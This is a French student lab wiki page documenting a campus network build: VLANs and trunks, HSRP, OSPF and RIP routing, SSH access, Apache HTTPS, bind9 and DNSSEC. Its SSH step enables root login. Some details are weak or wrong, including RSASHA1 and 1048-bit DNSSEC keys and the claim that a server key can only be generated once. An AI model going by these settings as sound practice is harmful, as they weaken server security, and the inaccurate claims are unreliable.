| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|-&lt;br /&gt;
| 300&lt;br /&gt;
| MANAGEMENT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Donner au commutateur 1 une IP dans le Vlan de management : &lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  interface Vlan300&lt;br /&gt;
  ip address 10.60.200.254 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
En première approche, nous avons souhaité activer une connexion sécurisée (SSH) de management en créant des clés RSA et une configuration VTY mais le commutateur n'a pas l'air, à première vue, d'implémenter cette fonctionnalité  nous laissant qu'avec du Telnet (en Clair) que nous avons donc décidé de ne pas configurer.&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R2=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
La notion de Bridge Domain Interface (BDI)&lt;br /&gt;
&lt;br /&gt;
HSRP: Hot standby router protocol [https://en.wikipedia.org/wiki/Hot_Standby_Router_Protocol plus]&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0                # adresse IPv4 locale&lt;br /&gt;
   standby version 2                                   # utilisation du protocol HSRP version 2 pour la haute disponibilité dans le cas où un routeur tombe en panne&lt;br /&gt;
   standby 101 ip 10.60.101.3                          # on définit un standby group pour cette interface avec l'adresse du routeur virtuel&lt;br /&gt;
   standby 101 preempt                                 # fait en sorte que le routeur actif avec la plus grande priorité prenne en charge le routage par préemption sur ce groupe &lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64         # configuration des adresses IPv6&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 105 par le R1&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 106 aussi par le R1&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
Et pour le management&lt;br /&gt;
  interface BDI300&lt;br /&gt;
   ip address 10.60.200.1 255.255.255.0&lt;br /&gt;
   no shut&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200,300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
Un routeur proposent différents protocoles de routage &lt;br /&gt;
 '''routerE304(config)'''#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
Nous allons en utiliser quelques uns dans notre implémentation&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
Vous pouvez faire un diagnostique des routes connues et leur sources une fois que l'interconnexion avec le réseau de l'école est configurée.&lt;br /&gt;
 '''routerE304#'''sh ip route ospf 1          &lt;br /&gt;
 Codes: L - local, C - connected, S - static, '''R - RIP''', M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, '''O - OSPF''', IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP&lt;br /&gt;
        a - application route&lt;br /&gt;
        + - replicated route, % - next hop override, p - overrides from PfR&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
 O*E2  0.0.0.0/0 [110/1] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
       10.0.0.0/8 is variably subnetted, 85 subnets, 8 masks&lt;br /&gt;
 O E2     10.0.8.0/24 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.11.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.17.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.18.0.0/22 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.0.0/17 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.252.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.254.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.22.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.24.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
  --More--&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation du réseau ===&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier etc/ssh/sshd_config de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier /etc/bind/named.conf.options la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier /etc/bind/ avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
